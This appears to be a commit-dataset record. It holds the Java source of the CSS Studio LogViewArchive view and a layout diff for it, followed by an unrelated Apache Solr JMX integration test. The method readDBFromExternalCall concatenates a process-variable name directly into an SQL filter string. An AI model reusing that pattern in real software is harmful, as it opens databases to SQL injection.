readDB.schedule(); } }); } /** * Create a Button that open a dialog to select required period. * @param comp the parent Composite for the Button. */ private void createFlexButton(final Composite comp) { Button bFlexSearch = new Button(comp, SWT.PUSH); bFlexSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bFlexSearch.setText(Messages.getString("LogViewArchive_user")); //$NON-NLS-1$ bFlexSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { StartEndDialog dlg = new StartEndDialog(_parentShell); if (dlg.open() == StartEndDialog.OK) { String lowString = dlg.getStartSpecification(); String highString = dlg.getEndSpecification(); try { StartEndTimeParser parser = new StartEndTimeParser(lowString, highString); Calendar from = parser.getStart(); Calendar to = parser.getEnd(); // ILogMessageArchiveAccess adba = new ArchiveDBAccess(); showNewTime(from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages(from, to); // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages( // from, to); readDB.schedule(); } catch (Exception e1) { // TODO Auto-generated catch block JmsLogsPlugin.logInfo(e1.getMessage()); } } } }); } /** * Create a Button that open a dialog to select required period and define filters. * @param comp the parent Composite for the Button. */ private void createSearchButton(final Composite comp) { Button bSearch = new Button(comp, SWT.PUSH); bSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bSearch.setText(Messages.getString("LogViewArchive_expert")); //$NON-NLS-1$ bSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { if(_fromTime==null){ ITimestamp now = TimestampFactory.now(); _fromTime = TimestampFactory.createTimestamp(now.seconds()-(24*60*60), now.nanoseconds()); //new Timestamp(fromDate.getTime()/1000); } if(_toTime==null){ _toTime = TimestampFactory.now(); } ExpertSearchDialog dlg = new ExpertSearchDialog(_parentShell, _fromTime, _toTime, _filter); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); if (dlg.open() == ExpertSearchDialog.OK) { _fromTime = dlg.getStart(); _toTime = dlg.getEnd(); double low = _fromTime.toDouble(); double high = _toTime.toDouble(); if (low < high) { from.setTimeInMillis((long) low * 1000); to.setTimeInMillis((long) high * 1000); } else { from.setTimeInMillis((long) high * 1000); to.setTimeInMillis((long) low * 1000); } showNewTime(from, to); _filter = dlg.getFilterString(); } ILogMessageArchiveAccess adba = new ArchiveDBAccess(); // from.add(GregorianCalendar.HOUR, -504); showNewTime(from, to); // ArrayList<HashMap<String, String>> am; // if(_filter.trim().length()>0){ // am = adba.getLogMessages(from, to, _filter); // }else{ // am = adba.getLogMessages(from, to); // } // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } }); } public void readDBFromExternalCall(IProcessVariable pv) { GregorianCalendar from = new GregorianCalendar(); GregorianCalendar to = new GregorianCalendar(); from.setTimeInMillis(to.getTimeInMillis() - 1000*60*60*24); System.out.println("from: " + from.toString() + " to: " + to.toString()); //$NON-NLS-1$ //$NON-NLS-2$ _filter = "AND ( (lower(aam.PROPERTY) like lower('NAME') AND lower(aam.VALUE) like lower('" + //$NON-NLS-1$ pv.getName() + "')))"; //$NON-NLS-1$ ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } /** * Set the two times from, to . * @param from the from a selectet. * @param to the to a selectet. */ private void showNewTime(final Calendar from, final Calendar to) { SimpleDateFormat sdf = new SimpleDateFormat(); try{ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); }catch(Exception e){ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getDefaultString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); JmsLogsPlugin.getDefault().getPreferenceStore().setToDefault(LogArchiveViewerPreferenceConstants.DATE_FORMAT); } _timeFrom.setText(sdf.format(from.getTime())); _fromTime = TimestampFactory.fromCalendar(from); _timeTo.setText(sdf.format(to.getTime())); _toTime = TimestampFactory.fromCalendar(to); // redraw _timeFrom.getParent().getParent().redraw(); } /** {@inheritDoc} */ @Override public void setFocus() { } /** {@inheritDoc} */ @Override public final void dispose() { super.dispose(); JmsLogsPlugin.getDefault().getPluginPreferences() .removePropertyChangeListener(_columnPropertyChangeListener); } /** @return get the from Time. */ public final Date getFromTime(){ return _fromTime.toCalendar().getTime(); } /** @return get the to Time. */ public final Date getToTime(){ return _toTime.toCalendar().getTime(); } /** * When dispose store the width for each column. */ public void saveColumn(){ int[] width = _jmsLogTableViewer.getColumnWidth(); String newPreferenceColumnString=""; //$NON-NLS-1$ String[] columns = JmsLogsPlugin.getDefault().getPluginPreferences().getString(LogArchiveViewerPreferenceConstants.P_STRINGArch).split(";"); //$NON-NLS-1$ if(width.length!=columns.length){ return; } for (int i = 0; i < columns.length; i++) { newPreferenceColumnString = newPreferenceColumnString.concat(columns[i].split(",")[0]+","+width[i]+";"); //$NON-NLS-1$ //$NON-NLS-2$ //$NON-NLS-3$ } newPreferenceColumnString = newPreferenceColumnString.substring(0,newPreferenceColumnString.length()-1); IPreferenceStore store = JmsLogsPlugin.getDefault().getPreferenceStore(); store.setValue(LogArchiveViewerPreferenceConstants.P_STRINGArch, newPreferenceColumnString); if(store.needsSaving()){ JmsLogsPlugin.getDefault().savePluginPreferences(); } } public void update(Observable arg0, Object arg1) { _disp.syncExec(new Runnable() { public void run() { _jmsMessageList.clearList(); _jmsLogTableViewer.refresh(); ArrayList<HashMap<String, String>> answer = _dbAnswer.getDBAnswer(); int size = answer.size(); if (size > 0) { _countLabel.setText(Integer.toString(size)); _jmsMessageList.addJMSMessageList(answer); } else { String[] propertyNames = JmsLogsPlugin.getDefault().getPluginPreferences(). getString(LogViewerPreferenceConstants.P_STRING).split(";"); //$NON-NLS-1$ JMSMessage jmsMessage = new JMSMessage(propertyNames); String firstColumnName = _columnNames[0]; jmsMessage.setProperty(firstColumnName, Messages.LogViewArchive_NoMessageInDB); _jmsMessageList.addJMSMessage(jmsMessage); } } }); } }
applications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java
/* * Copyright (c) 2006 Stiftung Deutsches Elektronen-Synchroton, * Member of the Helmholtz Association, (DESY), HAMBURG, GERMANY. * * THIS SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN "../AS IS" BASIS. * WITHOUT WARRANTY OF ANY KIND, EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR PARTICULAR PURPOSE AND * NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE * FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR * THE USE OR OTHER DEALINGS IN THE SOFTWARE. SHOULD THE SOFTWARE PROVE DEFECTIVE * IN ANY RESPECT, THE USER ASSUMES THE COST OF ANY NECESSARY SERVICING, REPAIR OR * CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. * NO USE OF ANY SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. * DESY HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, * OR MODIFICATIONS. * THE FULL LICENSE SPECIFYING FOR THE SOFTWARE THE REDISTRIBUTION, MODIFICATION, * USAGE AND OTHER RIGHTS AND OBLIGATIONS IS INCLUDED WITH THE DISTRIBUTION OF THIS * PROJECT IN THE FILE LICENSE.HTML. IF THE LICENSE IS NOT INCLUDED YOU MAY FIND A COPY * AT HTTP://WWW.DESY.DE/LEGAL/LICENSE.HTM */ package org.csstudio.alarm.table; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.HashMap; import java.util.Observable; import java.util.Observer; import org.csstudio.alarm.dbaccess.ArchiveDBAccess; import org.csstudio.alarm.dbaccess.archivedb.ILogMessageArchiveAccess; import org.csstudio.alarm.table.dataModel.JMSMessage; import org.csstudio.alarm.table.dataModel.JMSMessageList; import org.csstudio.alarm.table.expertSearch.ExpertSearchDialog; import org.csstudio.alarm.table.internal.localization.Messages; import org.csstudio.alarm.table.logTable.JMSLogTableViewer; import org.csstudio.alarm.table.preferences.LogArchiveViewerPreferenceConstants; import org.csstudio.alarm.table.preferences.LogViewerPreferenceConstants; import org.csstudio.alarm.table.readDB.DBAnswer; import org.csstudio.alarm.table.readDB.ReadDBJob; import org.csstudio.platform.data.ITimestamp; import org.csstudio.platform.data.TimestampFactory; import org.csstudio.platform.model.IProcessVariable; import org.csstudio.util.time.StartEndTimeParser; import org.csstudio.util.time.swt.StartEndDialog; import org.eclipse.jface.preference.IPreferenceStore; import org.eclipse.swt.SWT; import org.eclipse.swt.events.SelectionAdapter; import org.eclipse.swt.events.SelectionEvent; import org.eclipse.swt.graphics.Color; import org.eclipse.swt.layout.GridData; import org.eclipse.swt.layout.GridLayout; import org.eclipse.swt.widgets.Button; import org.eclipse.swt.widgets.Composite; import org.eclipse.swt.widgets.Display; import org.eclipse.swt.widgets.Group; import org.eclipse.swt.widgets.Label; import org.eclipse.swt.widgets.Shell; import org.eclipse.swt.widgets.Text; import org.eclipse.ui.part.ViewPart; /** * Simple view more like console, used to write log messages. * * @author jhatje * @author $Author$ * @version $Revision$ * @since 19.07.2007 */ public class LogViewArchive extends ViewPart implements Observer { /** The Id of this Object. */ public static final String ID = LogViewArchive.class.getName(); /** The Parent Shell. */ private Shell _parentShell = null; /** The JMS message list. */ private JMSMessageList _jmsMessageList = null; /** The JMS Logtable Viewer. */ private JMSLogTableViewer _jmsLogTableViewer = null; /** An Array whit the name of the Columns. */ private String[] _columnNames; /** Textfield witch contain the "from time". */ private Text _timeFrom; /** Textfield witch contain the "to time". */ private Text _timeTo; /** The selectet "from time". */ private ITimestamp _fromTime; /** The selectet "to time". */ private ITimestamp _toTime; /** The column property change listener. */ private ColumnPropertyChangeListener _columnPropertyChangeListener; /** The default / last filter. */ private String _filter= ""; //$NON-NLS-1$ /** * The Answer from the DB. */ private DBAnswer _dbAnswer = null; /** The Display. */ private Display _disp; /** The count of results. */ private Label _countLabel; public LogViewArchive() { super(); _dbAnswer = new DBAnswer(); _dbAnswer.addObserver(this); } /** {@inheritDoc} */ public final void createPartControl(final Composite parent) { _disp = parent.getDisplay(); _columnNames = JmsLogsPlugin.getDefault().getPluginPreferences() .getString(LogArchiveViewerPreferenceConstants.P_STRINGArch) .split(";"); //$NON-NLS-1$ _jmsMessageList = new JMSMessageList(_columnNames); _parentShell = parent.getShell(); GridLayout grid = new GridLayout(); grid.numColumns = 1; parent.setLayout(grid); Composite comp = new Composite(parent, SWT.NONE); comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); comp.setLayout(new GridLayout(4, true)); Group buttons = new Group(comp, SWT.LINE_SOLID); buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ buttons.setLayout(new GridLayout(5, true)); GridData gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; buttons.setLayoutData(gd); create24hButton(buttons); create72hButton(buttons); createWeekButton(buttons); createFlexButton(buttons); createSearchButton(buttons); Group from = new Group(comp, SWT.LINE_SOLID); from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ from.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); from.setLayout(new GridLayout(1, true)); _timeFrom = new Text(from, SWT.SINGLE); _timeFrom.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeFrom.setEditable(false); _timeFrom.setText(" "); //$NON-NLS-1$ Group to = new Group(comp, SWT.LINE_SOLID); to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ to.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); to.setLayout(new GridLayout(1, true)); _timeTo = new Text(to, SWT.SINGLE); _timeTo.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeTo.setEditable(false); // timeTo.setText(" "); Group count = new Group(comp, SWT.LINE_SOLID); count.setText(Messages.getString("LogViewArchive_count")); //$NON-NLS-1$ count.setLayout(new GridLayout(1, true)); gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; count.setLayoutData(gd); _countLabel = new Label(count,SWT.RIGHT); gd = new GridData(SWT.FILL,SWT.CENTER,true, false,1,1); _countLabel.setLayoutData(gd); _countLabel.setText("0"); //$NON-NLS-1$ _jmsLogTableViewer = new JMSLogTableViewer(parent, getSite(), _columnNames, _jmsMessageList, 3,SWT.SINGLE | SWT.FULL_SELECTION); _jmsLogTableViewer.setAlarmSorting(false); parent.pack(); _columnPropertyChangeListener = new ColumnPropertyChangeListener( LogArchiveViewerPreferenceConstants.P_STRINGArch, _jmsLogTableViewer); JmsLogsPlugin.getDefault().getPluginPreferences() .addPropertyChangeListener(_columnPropertyChangeListener); } /** * Create a Button to selet the last 24 hour. * @param comp the parent Composite for the Button. */ private void create24hButton(final Composite comp) { Button b24hSearch = new Button(comp, SWT.PUSH); b24hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b24hSearch.setText(Messages.getString("LogViewArchive_day")); //$NON-NLS-1$ b24hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -24); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create the a Button to selet the last 72 hour. * @param comp the parent {@link Composite} for the Button. */ private void create72hButton(final Composite comp) { Button b72hSearch = new Button(comp, SWT.PUSH); b72hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b72hSearch.setText(Messages.getString("LogViewArchive_3days")); //$NON-NLS-1$ b72hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -72); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button to selet the last week. * @param comp the parent Composite for the Button. */ private void createWeekButton(final Composite comp) { Button b168hSearch = new Button(comp, SWT.PUSH); b168hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false,1, 1)); b168hSearch.setText(Messages.getString("LogViewArchive_week")); //$NON-NLS-1$ b168hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -168); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button that open a dialog to select required period. * @param comp the parent Composite for the Button. */ private void createFlexButton(final Composite comp) { Button bFlexSearch = new Button(comp, SWT.PUSH); bFlexSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bFlexSearch.setText(Messages.getString("LogViewArchive_user")); //$NON-NLS-1$ bFlexSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { StartEndDialog dlg = new StartEndDialog(_parentShell); if (dlg.open() == StartEndDialog.OK) { String lowString = dlg.getStartSpecification(); String highString = dlg.getEndSpecification(); try { StartEndTimeParser parser = new StartEndTimeParser(lowString, highString); Calendar from = parser.getStart(); Calendar to = parser.getEnd(); // ILogMessageArchiveAccess adba = new ArchiveDBAccess(); showNewTime(from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages(from, to); // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages( // from, to); readDB.schedule(); } catch (Exception e1) { // TODO Auto-generated catch block JmsLogsPlugin.logInfo(e1.getMessage()); } } } }); } /** * Create a Button that open a dialog to select required period and define filters. * @param comp the parent Composite for the Button. */ private void createSearchButton(final Composite comp) { Button bSearch = new Button(comp, SWT.PUSH); bSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bSearch.setText(Messages.getString("LogViewArchive_expert")); //$NON-NLS-1$ bSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { if(_fromTime==null){ ITimestamp now = TimestampFactory.now(); _fromTime = TimestampFactory.createTimestamp(now.seconds()-(24*60*60), now.nanoseconds()); //new Timestamp(fromDate.getTime()/1000); } if(_toTime==null){ _toTime = TimestampFactory.now(); } ExpertSearchDialog dlg = new ExpertSearchDialog(_parentShell, _fromTime, _toTime, _filter); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); if (dlg.open() == ExpertSearchDialog.OK) { _fromTime = dlg.getStart(); _toTime = dlg.getEnd(); double low = _fromTime.toDouble(); double high = _toTime.toDouble(); if (low < high) { from.setTimeInMillis((long) low * 1000); to.setTimeInMillis((long) high * 1000); } else { from.setTimeInMillis((long) high * 1000); to.setTimeInMillis((long) low * 1000); } showNewTime(from, to); _filter = dlg.getFilterString(); } ILogMessageArchiveAccess adba = new ArchiveDBAccess(); // from.add(GregorianCalendar.HOUR, -504); showNewTime(from, to); // ArrayList<HashMap<String, String>> am; // if(_filter.trim().length()>0){ // am = adba.getLogMessages(from, to, _filter); // }else{ // am = adba.getLogMessages(from, to); // } // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } }); } public void readDBFromExternalCall(IProcessVariable pv) { GregorianCalendar from = new GregorianCalendar(); GregorianCalendar to = new GregorianCalendar(); from.setTimeInMillis(to.getTimeInMillis() - 1000*60*60*24); System.out.println("from: " + from.toString() + " to: " + to.toString()); //$NON-NLS-1$ //$NON-NLS-2$ _filter = "AND ( (lower(aam.PROPERTY) like lower('NAME') AND lower(aam.VALUE) like lower('" + //$NON-NLS-1$ pv.getName() + "')))"; //$NON-NLS-1$ ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } /** * Set the two times from, to . * @param from the from a selectet. * @param to the to a selectet. */ private void showNewTime(final Calendar from, final Calendar to) { SimpleDateFormat sdf = new SimpleDateFormat(); try{ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); }catch(Exception e){ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getDefaultString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); JmsLogsPlugin.getDefault().getPreferenceStore().setToDefault(LogArchiveViewerPreferenceConstants.DATE_FORMAT); } _timeFrom.setText(sdf.format(from.getTime())); _fromTime = TimestampFactory.fromCalendar(from); _timeTo.setText(sdf.format(to.getTime())); _toTime = TimestampFactory.fromCalendar(to); // redraw _timeFrom.getParent().getParent().redraw(); } /** {@inheritDoc} */ @Override public void setFocus() { } /** {@inheritDoc} */ @Override public final void dispose() { super.dispose(); JmsLogsPlugin.getDefault().getPluginPreferences() .removePropertyChangeListener(_columnPropertyChangeListener); } /** @return get the from Time. */ public final Date getFromTime(){ return _fromTime.toCalendar().getTime(); } /** @return get the to Time. */ public final Date getToTime(){ return _toTime.toCalendar().getTime(); } /** * When dispose store the width for each column. */ public void saveColumn(){ int[] width = _jmsLogTableViewer.getColumnWidth(); String newPreferenceColumnString=""; //$NON-NLS-1$ String[] columns = JmsLogsPlugin.getDefault().getPluginPreferences().getString(LogArchiveViewerPreferenceConstants.P_STRINGArch).split(";"); //$NON-NLS-1$ if(width.length!=columns.length){ return; } for (int i = 0; i < columns.length; i++) { newPreferenceColumnString = newPreferenceColumnString.concat(columns[i].split(",")[0]+","+width[i]+";"); //$NON-NLS-1$ //$NON-NLS-2$ //$NON-NLS-3$ } newPreferenceColumnString = newPreferenceColumnString.substring(0,newPreferenceColumnString.length()-1); IPreferenceStore store = JmsLogsPlugin.getDefault().getPreferenceStore(); store.setValue(LogArchiveViewerPreferenceConstants.P_STRINGArch, newPreferenceColumnString); if(store.needsSaving()){ JmsLogsPlugin.getDefault().savePluginPreferences(); } } public void update(Observable arg0, Object arg1) { _disp.syncExec(new Runnable() { public void run() { _jmsMessageList.clearList(); _jmsLogTableViewer.refresh(); ArrayList<HashMap<String, String>> answer = _dbAnswer.getDBAnswer(); int size = answer.size(); if (size > 0) { _countLabel.setText(Integer.toString(size)); _jmsMessageList.addJMSMessageList(answer); } else { String[] propertyNames = JmsLogsPlugin.getDefault().getPluginPreferences(). getString(LogViewerPreferenceConstants.P_STRING).split(";"); //$NON-NLS-1$ JMSMessage jmsMessage = new JMSMessage(propertyNames); String firstColumnName = _columnNames[0]; jmsMessage.setProperty(firstColumnName, Messages.LogViewArchive_NoMessageInDB); _jmsMessageList.addJMSMessage(jmsMessage); } } }); } }
Change Layout of the Head
applications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java
Change Layout of the Head
<ide><path>pplications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java <ide> parent.setLayout(grid); <ide> Composite comp = new Composite(parent, SWT.NONE); <ide> comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); <del> comp.setLayout(new GridLayout(4, true)); <add> comp.setLayout(new GridLayout(4, false)); <ide> <ide> Group buttons = new Group(comp, SWT.LINE_SOLID); <ide> buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ <ide> <ide> Group from = new Group(comp, SWT.LINE_SOLID); <ide> from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ <del> from.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); <add> gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); <add> gd.minimumHeight = 60; <add> gd.minimumWidth = 150; <add> from.setLayoutData(gd); <ide> from.setLayout(new GridLayout(1, true)); <ide> <ide> _timeFrom = new Text(from, SWT.SINGLE); <ide> _timeFrom.setText(" "); //$NON-NLS-1$ <ide> Group to = new Group(comp, SWT.LINE_SOLID); <ide> to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ <del> to.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); <add> gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); <add> gd.minimumHeight = 60; <add> gd.minimumWidth = 150; <add> to.setLayoutData(gd); <ide> to.setLayout(new GridLayout(1, true)); <ide> <ide> _timeTo = new Text(to, SWT.SINGLE); <ide> count.setLayout(new GridLayout(1, true)); <ide> gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); <ide> gd.minimumHeight = 60; <del> gd.minimumWidth = 300; <add> gd.minimumWidth = 75; <ide> count.setLayoutData(gd); <ide> <ide> _countLabel = new Label(count,SWT.RIGHT);
Java
apache-2.0
d63aa91ef7c04c4f1b35ed21281467d17cd95dc8
0
cscorley/solr-only-mirror,cscorley/solr-only-mirror,cscorley/solr-only-mirror
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.core; import org.apache.solr.core.JmxMonitoredMap.SolrDynamicMBean; import org.apache.solr.util.AbstractSolrTestCase; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import javax.management.*; import java.lang.management.ManagementFactory; import java.util.*; /** * Test for JMX Integration * * * @since solr 1.3 */ public class TestJmxIntegration extends AbstractSolrTestCase { @Override public String getSchemaFile() { return "schema.xml"; } @Override public String getSolrConfigFile() { return "solrconfig.xml"; } @Override @Before public void setUp() throws Exception { // Make sure that at least one MBeanServer is available MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); super.setUp(); } @Override @After public void tearDown() throws Exception { super.tearDown(); } @Test public void testJmxRegistration() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxRegistration: " + servers); assertNotNull("MBeanServers were null", servers); assertFalse("No MBeanServer was found", servers.isEmpty()); MBeanServer mbeanServer = servers.get(0); assertTrue("No MBeans found in server", mbeanServer.getMBeanCount() > 0); Set<ObjectInstance> objects = mbeanServer.queryMBeans(null, null); assertFalse("No SolrInfoMBean objects found in mbean server", objects .isEmpty()); for (ObjectInstance o : objects) { MBeanInfo mbeanInfo = mbeanServer.getMBeanInfo(o.getObjectName()); if (mbeanInfo.getClassName().endsWith(SolrDynamicMBean.class.getName())) { assertTrue("No Attributes found for mbean: " + mbeanInfo, mbeanInfo .getAttributes().length > 0); } } } @Test public void testJmxUpdate() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxUpdate: " + servers); log.info(h.getCore().getInfoRegistry().toString()); SolrInfoMBean bean = null; // wait until searcher is registered for (int i=0; i<100; i++) { bean = h.getCore().getInfoRegistry().get("searcher"); if (bean != null) break; Thread.sleep(250); } if (bean==null) throw new RuntimeException("searcher was never registered"); ObjectName searcher = getObjectName("searcher", bean); MBeanServer mbeanServer = servers.get(0); log.info("Mbeans in server: " + mbeanServer.queryNames(null, null)); assertFalse("No mbean found for SolrIndexSearcher", mbeanServer.queryMBeans(searcher, null).isEmpty()); int oldNumDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertU(adoc("id", "1")); assertU("commit", commit()); int numDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertTrue("New numDocs is same as old numDocs as reported by JMX", numDocs > oldNumDocs); } @Test @Ignore("timing problem? https://issues.apache.org/jira/browse/SOLR-2715") public void testJmxOnCoreReload() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); MBeanServer mbeanServer = servers.get(0); String coreName = h.getCore().getName(); if (coreName.length() == 0) { coreName = h.getCoreContainer().getDefaultCoreName().length() > 0 ? h.getCoreContainer().getDefaultCoreName() : ""; } Set<ObjectInstance> oldBeans = mbeanServer.queryMBeans(null, null); int oldNumberOfObjects = 0; for (ObjectInstance bean : oldBeans) { try { if (String.valueOf(h.getCore().hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { oldNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } log.info("Before Reload: Size of infoRegistry: " + h.getCore().getInfoRegistry().size() + " MBeans: " + oldNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", h.getCore().getInfoRegistry().size(), oldNumberOfObjects); h.getCoreContainer().reload(coreName); Set<ObjectInstance> newBeans = mbeanServer.queryMBeans(null, null); int newNumberOfObjects = 0; int registrySize = 0; SolrCore core = h.getCoreContainer().getCore(coreName); try { registrySize = core.getInfoRegistry().size(); for (ObjectInstance bean : newBeans) { try { if (String.valueOf(core.hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { newNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } } finally { core.close(); } log.info("After Reload: Size of infoRegistry: " + registrySize + " MBeans: " + newNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", registrySize, newNumberOfObjects); } private ObjectName getObjectName(String key, SolrInfoMBean infoBean) throws MalformedObjectNameException { Hashtable<String, String> map = new Hashtable<String, String>(); map.put("type", key); map.put("id", infoBean.getName()); String coreName = h.getCore().getName(); return ObjectName.getInstance(("solr" + (null != coreName ? "/" + coreName : "")), map); } }
core/src/test/org/apache/solr/core/TestJmxIntegration.java
